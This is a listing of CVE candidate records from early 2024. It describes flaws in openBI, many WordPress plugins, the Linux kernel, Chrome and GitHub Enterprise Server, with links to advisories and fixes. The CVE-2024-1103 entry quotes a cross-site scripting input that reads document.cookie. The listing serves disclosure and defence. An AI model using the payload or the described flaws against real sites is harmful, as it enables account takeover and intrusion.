CVE    2024    1116    Candidate    A vulnerability was found in openBI up to 1.0.8. It has been classified as critical. Affected is the function index of the file /application/plugins/controller/Upload.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252474 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/uCElTQRGWVyw   |   URL:https://note.zhaoj.in/share/uCElTQRGWVyw   |   MISC:https://vuldb.com/?ctiid.252474   |   URL:https://vuldb.com/?ctiid.252474   |   MISC:https://vuldb.com/?id.252474   |   URL:https://vuldb.com/?id.252474    Assigned (20240131)
CVE    2024    1115    Candidate    A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function dlfile of the file /application/websocket/controller/Setting.php. The manipulation of the argument phpPath leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252473 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/81JmiyogcYL7   |   URL:https://note.zhaoj.in/share/81JmiyogcYL7   |   MISC:https://vuldb.com/?ctiid.252473   |   URL:https://vuldb.com/?ctiid.252473   |   MISC:https://vuldb.com/?id.252473   |   URL:https://vuldb.com/?id.252473    Assigned (20240131)
CVE    2024    1114    Candidate    A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function dlfile of the file /application/index/controller/Screen.php. The manipulation of the argument fileUrl leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252472.    MISC:https://note.zhaoj.in/share/9wv48TygKRxo   |   URL:https://note.zhaoj.in/share/9wv48TygKRxo   |   MISC:https://vuldb.com/?ctiid.252472   |   URL:https://vuldb.com/?ctiid.252472   |   MISC:https://vuldb.com/?id.252472   |   URL:https://vuldb.com/?id.252472    Assigned (20240131)
CVE    2024    1113    Candidate    A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadUnity of the file /application/index/controller/Unity.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252471.    MISC:https://note.zhaoj.in/share/hPSx8li8LFfJ   |   URL:https://note.zhaoj.in/share/hPSx8li8LFfJ   |   MISC:https://vuldb.com/?ctiid.252471   |   URL:https://vuldb.com/?ctiid.252471   |   MISC:https://vuldb.com/?id.252471   |   URL:https://vuldb.com/?id.252471    Assigned (20240131)
CVE    2024    1112    Candidate    Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-resource-hacker   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-resource-hacker    Assigned (20240131)
CVE    2024    1111    Candidate    A vulnerability, which was classified as problematic, has been found in SourceCodester QR Code Login System 1.0. Affected by this issue is some unknown functionality of the file add-user.php. The manipulation of the argument qr-code leads to cross site scripting. The attack may be launched remotely. VDB-252470 is the identifier assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.252470   |   URL:https://vuldb.com/?ctiid.252470   |   MISC:https://vuldb.com/?id.252470   |   URL:https://vuldb.com/?id.252470    Assigned (20240131)
CVE    2024    1110    Candidate    The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init() function in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to import the plugin's settings.    MISC:https://github.com/podlove/podlove-publisher/commit/7873ff520631087e2f10737860cdcd64d53187ba   |   URL:https://github.com/podlove/podlove-publisher/commit/7873ff520631087e2f10737860cdcd64d53187ba   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve    Assigned (20240131)
CVE    2024    1109    Candidate    The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the init_download() and init() functions in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to export the plugin's tracking data and podcast information.    MISC:https://github.com/podlove/podlove-publisher/commit/0ac83d1955aa964a358833b1b5ce790fff45b3f4   |   URL:https://github.com/podlove/podlove-publisher/commit/0ac83d1955aa964a358833b1b5ce790fff45b3f4   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve    Assigned (20240131)
CVE    2024    1108    Candidate    The Plugin Groups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_init() function in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to change the settings of the plugin, which can also cause a denial of service due to a misconfiguration.    MISC:https://plugins.trac.wordpress.org/changeset/3036754/plugin-groups/trunk/classes/class-plugin-groups.php   |   URL:https://plugins.trac.wordpress.org/changeset/3036754/plugin-groups/trunk/classes/class-plugin-groups.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8298f1fb-3165-40e3-9192-805a07c14cae?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8298f1fb-3165-40e3-9192-805a07c14cae?source=cve    Assigned (20240131)
CVE    2024    1106    Candidate    The Shariff Wrapper WordPress plugin before 4.6.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).    MISC:https://wpscan.com/vulnerability/0672f8af-33e2-459c-ac8a-7351247a8a26/   |   URL:https://wpscan.com/vulnerability/0672f8af-33e2-459c-ac8a-7351247a8a26/    Assigned (20240131)
CVE    2024    1104    Candidate    An unauthenticated remote attacker can bypass the brute force prevention mechanism and disturb the webservice for all users.    MISC:https://www.areal-topkapi.com/en/services/security-bulletins   |   URL:https://www.areal-topkapi.com/en/services/security-bulletins    Assigned (20240131)
CVE    2024    1103    Candidate    A vulnerability was found in CodeAstro Real Estate Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file profile.php of the component Feedback Form. The manipulation of the argument Your Feedback with the input <img src=x onerror=alert(document.cookie)> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252458 is the identifier assigned to this vulnerability.    MISC:https://docs.google.com/document/d/18M55HRrxHQ9Jhph6CwWF-d5epAKtOSHt/edit?usp=drive_link&ouid=105609487033659389545&rtpof=true&sd=true   |   URL:https://docs.google.com/document/d/18M55HRrxHQ9Jhph6CwWF-d5epAKtOSHt/edit?usp=drive_link&ouid=105609487033659389545&rtpof=true&sd=true   |   MISC:https://vuldb.com/?ctiid.252458   |   URL:https://vuldb.com/?ctiid.252458   |   MISC:https://vuldb.com/?id.252458   |   URL:https://vuldb.com/?id.252458    Assigned (20240131)
CVE    2024    1099    Candidate    A vulnerability was found in Rebuild up to 3.5.5. It has been classified as problematic. Affected is the function getFileOfData of the file /filex/read-raw. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252456.    MISC:https://vuldb.com/?ctiid.252456   |   URL:https://vuldb.com/?ctiid.252456   |   MISC:https://vuldb.com/?id.252456   |   URL:https://vuldb.com/?id.252456   |   MISC:https://www.yuque.com/mailemonyeyongjuan/tha8tr/dcilugg0htp973nx   |   URL:https://www.yuque.com/mailemonyeyongjuan/tha8tr/dcilugg0htp973nx    Assigned (20240131)
CVE    2024    1098    Candidate    A vulnerability was found in Rebuild up to 3.5.5 and classified as problematic. This issue affects the function QiniuCloud.getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to information disclosure. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252455.    MISC:https://vuldb.com/?ctiid.252455   |   URL:https://vuldb.com/?ctiid.252455   |   MISC:https://vuldb.com/?id.252455   |   URL:https://vuldb.com/?id.252455   |   MISC:https://www.yuque.com/mailemonyeyongjuan/tha8tr/ouiw375l0m8mw5ls   |   URL:https://www.yuque.com/mailemonyeyongjuan/tha8tr/ouiw375l0m8mw5ls    Assigned (20240131)
CVE    2024    1096    Candidate    Twister Antivirus v8.17 is vulnerable to a Denial of Service vulnerability by triggering the 0x80112067, 0x801120CB, 0x801120CC, 0x80112044, 0x8011204B, 0x8011204F, 0x80112057, 0x8011205B, 0x8011205F, 0x80112063, 0x8011206F, 0x80112073, 0x80112077, 0x80112078, 0x8011207C and 0x80112080 IOCTL codes of the fildds.sys driver.    MISC:http://www.filseclab.com/en-us/products/twister.htm   |   URL:http://www.filseclab.com/en-us/products/twister.htm   |   MISC:https://fluidattacks.com/advisories/holiday/   |   URL:https://fluidattacks.com/advisories/holiday/    Assigned (20240131)
CVE    2024    1095    Candidate    The Build & Control Block Patterns – Boost up Gutenberg Editor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the settings_export() function in all versions up to, and including, 1.3.5.4. This makes it possible for unauthenticated attackers to export the plugin's settings.    MISC:https://plugins.trac.wordpress.org/browser/control-block-patterns/trunk/classes/Settings/SettingsPage.php#L166   |   URL:https://plugins.trac.wordpress.org/browser/control-block-patterns/trunk/classes/Settings/SettingsPage.php#L166   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/38f09a45-2b11-47c7-af16-c7f9c3a46e0e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/38f09a45-2b11-47c7-af16-c7f9c3a46e0e?source=cve    Assigned (20240131)
CVE    2024    1093    Candidate    The Change Memory Limit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_logic() function hooked via admin_init in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update the memory limit.    MISC:https://plugins.trac.wordpress.org/browser/change-memory-limit/trunk/change-mem-limit.php#L104   |   URL:https://plugins.trac.wordpress.org/browser/change-memory-limit/trunk/change-mem-limit.php#L104   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/eee7344d-5459-4558-a557-d8c5935ecc30?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/eee7344d-5459-4558-a557-d8c5935ecc30?source=cve    Assigned (20240131)
CVE    2024    1092    Candidate    The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the feedzy dashboard in all versions up to, and including, 4.4.1. This makes it possible for authenticated attackers, with contributor access or higher, to create, edit or delete feed categories created by them.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3030538%40feedzy-rss-feeds%2Ftrunk&old=3028200%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/98053141-fe97-4bd4-b820-b6cca3426109?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/98053141-fe97-4bd4-b820-b6cca3426109?source=cve    Assigned (20240130)
CVE    2024    1091    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reinitialize function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to remove all plugin data.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb8b08c-a028-48bd-acad-c00313fe06b8?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb8b08c-a028-48bd-acad-c00313fe06b8?source=cve    Assigned (20240130)
CVE    2024    1090    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the stopOptimizeAll function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify image optimization settings.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f3fae909-5564-4e0a-9114-edd0e45865e5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f3fae909-5564-4e0a-9114-edd0e45865e5?source=cve    Assigned (20240130)
CVE    2024    1089    Candidate    The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the optimizeAllOn function in all versions up to, and including, 3.1.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify image optimization settings.    MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ff16906-2516-4b3c-8217-e3fb24924e27?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ff16906-2516-4b3c-8217-e3fb24924e27?source=cve    Assigned (20240130)
CVE    2024    1088    Candidate    The Password Protected Store for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9 via the REST API. This makes it possible for unauthenticated attackers to extract sensitive data including post titles and content.    MISC:https://wordpress.org/plugins/password-protected-woo-store/   |   URL:https://wordpress.org/plugins/password-protected-woo-store/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7ae1e8fd-4d1b-4590-a141-f93d6347c0f2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7ae1e8fd-4d1b-4590-a141-f93d6347c0f2?source=cve    Assigned (20240130)
CVE    2024    1087    Candidate    ** REJECT ** This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is a duplicate of CVE-2024-1085.        Assigned (20240130)
CVE    2024    1086    Candidate    A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT. We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.    FEDORA:FEDORA-2024-2116a8468b   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/   |   MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660   |   URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660   |   MISC:https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660   |   URL:https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660    Assigned (20240130)
CVE    2024    1085    Candidate    A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The nft_setelem_catchall_deactivate() function checks whether the catch-all set element is active in the current generation instead of the next generation before freeing it, but only flags it inactive in the next generation, making it possible to free the element multiple times, leading to a double free vulnerability. We recommend upgrading past commit b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7.    MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7   |   URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7   |   MISC:https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7   |   URL:https://kernel.dance/b1db244ffd041a49ecc9618e8feb6b5c1afcdaa7    Assigned (20240130)
CVE    2024    1084    Candidate    Cross-site Scripting in the tag name pattern field in the tag protections UI in GitHub Enterprise Server allows a malicious website that requires user interaction and social engineering to make changes to a user account via CSP bypass with created CSRF tokens. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in all versions of 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240130)
CVE    2024    1083    Candidate    The Simple Restrict plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.6 via the REST API. This makes it possible for authenticated attackers to bypass the plugin's restrictions to extract post titles and content.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035727%40simple-restrict&new=3035727%40simple-restrict&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035727%40simple-restrict&new=3035727%40simple-restrict&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/65963ce0-6589-4753-837c-14ef37a1a9e3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/65963ce0-6589-4753-837c-14ef37a1a9e3?source=cve    Assigned (20240130)
CVE    2024    1082    Candidate    A path traversal vulnerability was identified in GitHub Enterprise Server that allowed an attacker to gain unauthorized read permission to files by deploying arbitrary symbolic links to a GitHub Pages site with a specially crafted artifact tarball. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.15, 3.9.10, 3.10.7, 3.11.5. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240130)
CVE    2024    1081    Candidate    The 3D FlipBook – PDF Flipbook WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bookmark feature in all versions up to, and including, 1.15.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038174%40interactive-3d-flipbook-powered-physics-engine&new=3038174%40interactive-3d-flipbook-powered-physics-engine&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038174%40interactive-3d-flipbook-powered-physics-engine&new=3038174%40interactive-3d-flipbook-powered-physics-engine&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/807eadff-b39e-4d7a-9b0a-06fc18a90626?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/807eadff-b39e-4d7a-9b0a-06fc18a90626?source=cve    Assigned (20240130)
CVE    2024    1080    Candidate    The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the heading tag in all versions up to, and including, 2.7.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/heading/includes/frontend.php#L1   |   URL:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/heading/includes/frontend.php#L1   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d62d3ca5-5795-46ef-ad8c-4474ff1e504e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d62d3ca5-5795-46ef-ad8c-4474ff1e504e?source=cve    Assigned (20240130)
CVE    2024    1079    Candidate    The Quiz Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_show_results() function in all versions up to, and including, 6.5.2.4. This makes it possible for unauthenticated attackers to fetch arbitrary quiz results which can contain PII.    MISC:https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve    Assigned (20240130)
CVE    2024    1078    Candidate    The Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ays_quick_start() and add_question_rows() functions in all versions up to, and including, 6.5.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary quizzes.    MISC:https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032035/quiz-maker/tags/6.5.2.5/admin/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve    Assigned (20240130)
CVE    2024    1077    Candidate    Use after free in Network in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)    FEDORA:FEDORA-2024-87e0baecb6   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/   |   FEDORA:FEDORA-2024-ca36dcc1d3   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html   |   MISC:https://crbug.com/1511085   |   URL:https://crbug.com/1511085    Assigned (20240130)
CVE    2024    1075    Candidate    The Minimal Coming Soon – Coming Soon Page plugin for WordPress is vulnerable to maintenance mode bypass and information disclosure in all versions up to, and including, 2.37. This is due to the plugin improperly validating the request path. This makes it possible for unauthenticated attackers to bypass maintenance mode and view pages that should be hidden.    MISC:https://plugins.trac.wordpress.org/browser/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php#L67   |   URL:https://plugins.trac.wordpress.org/browser/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php#L67   |   MISC:https://plugins.trac.wordpress.org/changeset/3031149/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php   |   URL:https://plugins.trac.wordpress.org/changeset/3031149/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78203b98-15bc-4d8e-9278-c472b518be07?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78203b98-15bc-4d8e-9278-c472b518be07?source=cve    Assigned (20240130)
CVE    2024    1074    Candidate    The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the audio widget 'link_url' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/audio/includes/frontend.php#L34   |   URL:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/audio/includes/frontend.php#L34   |   MISC:https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/modules/audio/includes/frontend.php?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/modules/audio/includes/frontend.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/modules/audio/includes/frontend.php?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/modules/audio/includes/frontend.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a49e4f5a-ac9d-4f9b-8de2-c7871da8de35?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a49e4f5a-ac9d-4f9b-8de2-c7871da8de35?source=cve    Assigned (20240130)
CVE    2024    1073    Candidate    The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'filter_array' parameter in all versions up to, and including, 5.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/wp-slimstat/trunk/admin/index.php#L1004   |   URL:https://plugins.trac.wordpress.org/browser/wp-slimstat/trunk/admin/index.php#L1004   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029858%40wp-slimstat&new=3029858%40wp-slimstat&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/33cba63c-4629-48fd-850f-f68dad626a67?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/33cba63c-4629-48fd-850f-f68dad626a67?source=cve    Assigned (20240130)
CVE    2024    1072    Candidate    The Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the seedprod_lite_new_lpage function in all versions up to, and including, 6.15.21. This makes it possible for unauthenticated attackers to change the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin. Version 6.15.22 addresses this issue but introduces a bug affecting admin pages. We suggest upgrading to 6.15.23.    MISC:https://plugins.trac.wordpress.org/changeset/3029567/coming-soon/trunk/app/lpage.php   |   URL:https://plugins.trac.wordpress.org/changeset/3029567/coming-soon/trunk/app/lpage.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve    Assigned (20240130)
